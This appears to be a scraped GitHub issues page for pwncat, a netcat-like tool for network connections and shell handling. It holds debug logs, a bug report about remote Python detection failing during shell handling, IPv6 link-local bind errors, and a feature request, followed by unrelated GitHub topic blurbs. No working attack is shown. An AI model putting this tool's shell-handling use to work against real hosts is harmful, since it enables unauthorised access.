test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo
string from client
2022-08-09 13:51:35,685 DEBUG [STDIN] 3435:producer(): Received 19 bytes from STDIN
2022-08-09 13:51:35,685 TRACE [STDIN] 3436:producer(): Received: b'string from client\n'
2022-08-09 13:51:35,686 TRACE [STDIN] 4016:run_action(): [STDIN] Producer received: b'string from client\n'
2022-08-09 13:51:35,686 DEBUG [STDIN] 1898:send(): Trying to send 19 bytes to 192.168.10.184:9999
2022-08-09 13:51:35,686 TRACE [STDIN] 1904:send(): Trying to send: b'string from client\n'
2022-08-09 13:51:35,686 DEBUG [STDIN] 1921:send(): Sent 19 bytes to 192.168.10.184:9999 (0 bytes remaining)
2022-08-09 13:51:49,141 DEBUG [RECV] 2032:receive(): Received 19 bytes from 192.168.10.184:9999
2022-08-09 13:51:49,142 TRACE [RECV] 2038:receive(): Received: b'STRING FROM SERVER\n'
2022-08-09 13:51:49,142 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'STRING FROM SERVER\n'
STRING FROM SERVER
After iterating through all combinations, pwncat dumps to existing shell (which still echoes content back and forth) because it cannot find python; however, python is definitely installed and this bug persists across linux distros. I'm pretty sure there's something wrong with the client returning remote_command output because the only packets from client to server had null payloads.
Here is the terminal output (address is masked for privacy).
$ pwncat -V
pwncat: Version 0.1.0 (https://github.com/cytopia/pwncat) by cytopia
$ pwncat -vvvv fe80::xxxx:xxxx:xxxx:xxxx%eth0 7777
2020-08-16 13:52:30,945 DEBUG [MainThread] 3391:__init__(): STDOUT isatty: True
2020-08-16 13:52:30,945 DEBUG [MainThread] 3392:__init__(): STDIN isatty: True
2020-08-16 13:52:30,945 DEBUG [MainThread] 3393:__init__(): STDIN posix: False (posix)
2020-08-16 13:52:30,945 DEBUG [MainThread] 1465:create_socket(): Creating (family 10/IPv6, TCP) socket
2020-08-16 13:52:30,945 DEBUG [MainThread] 1485:create_socket(): Disabling IPv4 support on IPv6 socket
2020-08-16 13:52:30,945 DEBUG [MainThread] 1465:create_socket(): Creating (family 2/IPv4, TCP) socket
2020-08-16 13:52:30,946 DEBUG [MainThread] 1429:gethostbyname(): Resolved IPv6 host: fe80::xxxx:xxxx:xxxx:xxxx
2020-08-16 13:52:30,946 DEBUG [MainThread] 1435:gethostbyname(): Resolving IPv4 host: fe80::xxxx:xxxx:xxxx:xxxx%eth0 failed: [Errno -9] Address family for hostname not supported
2020-08-16 13:52:30,946 DEBUG [MainThread] 1641:connect(): Connecting to fe80::xxxx:xxxx:xxxx:xxxx:7777 (family 10/IPv6, TCP)
2020-08-16 13:52:30,946 ERROR [MainThread] 2122:run_client(): Connecting to fe80::xxxx:xxxx:xxxx:xxxx:7777 (family 10/IPv6, TCP) failed: [Errno 22] Invalid argument
2020-08-16 13:52:30,946 INFO [MainThread] 2976:__client_reconnect_to_server(): Reconnect count is used up. Shutting down.
$ pwncat -vvvv -l fe80::xxxx:xxxx:xxxx:xxxx%eth0 7777
2020-08-16 13:52:35,838 DEBUG [MainThread] 3391:__init__(): STDOUT isatty: True
2020-08-16 13:52:35,838 DEBUG [MainThread] 3392:__init__(): STDIN isatty: True
2020-08-16 13:52:35,838 DEBUG [MainThread] 3393:__init__(): STDIN posix: False (posix)
2020-08-16 13:52:35,838 DEBUG [MainThread] 1465:create_socket(): Creating (family 10/IPv6, TCP) socket
2020-08-16 13:52:35,838 DEBUG [MainThread] 1485:create_socket(): Disabling IPv4 support on IPv6 socket
2020-08-16 13:52:35,838 DEBUG [MainThread] 1465:create_socket(): Creating (family 2/IPv4, TCP) socket
2020-08-16 13:52:35,839 DEBUG [MainThread] 1429:gethostbyname(): Resolved IPv6 host: fe80::xxxx:xxxx:xxxx:xxxx
2020-08-16 13:52:35,839 DEBUG [MainThread] 1435:gethostbyname(): Resolving IPv4 host: fe80::xxxx:xxxx:xxxx:xxxx%eth0 failed: [Errno -9] Address family for hostname not supported
2020-08-16 13:52:35,839 DEBUG [MainThread] 2187:run_server(): Removing (family 2/IPv4) due to: Resolving IPv4 host: fe80::xxxx:xxxx:xxxx:xxxx%eth0 failed: [Errno -9] Address family for hostname not supported
2020-08-16 13:52:35,839 DEBUG [MainThread] 1517:bind(): Binding (family 10/IPv6, TCP) socket to fe80::xxxx:xxxx:xxxx:xxxx:7777
2020-08-16 13:52:35,839 DEBUG [MainThread] 2207:run_server(): Removing (family 10/IPv6) due to: Binding (family 10/IPv6, TCP) socket to fe80::xxxx:xxxx:xxxx:xxxx:7777 failed: [Errno 22] Invalid argument
2020-08-16 13:52:35,839 ERROR [MainThread] 2216:run_server(): Bind Error: Could not bind any socket
2020-08-16 13:52:35,839 INFO [MainThread] 3034:__server_rebind(): Rebind count is used up. Shutting down.Same as above log.
Works same as IPv6 global unicast address.
Invalid argument / Bind Error
By default, when a client connects to a server, the operating systems chooses the the source port and address. As it is also possible to specify that yourself, pwncat should have it too to be more flexible
Be able to specify source address and port for clients for more feature-parity with netcat.
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.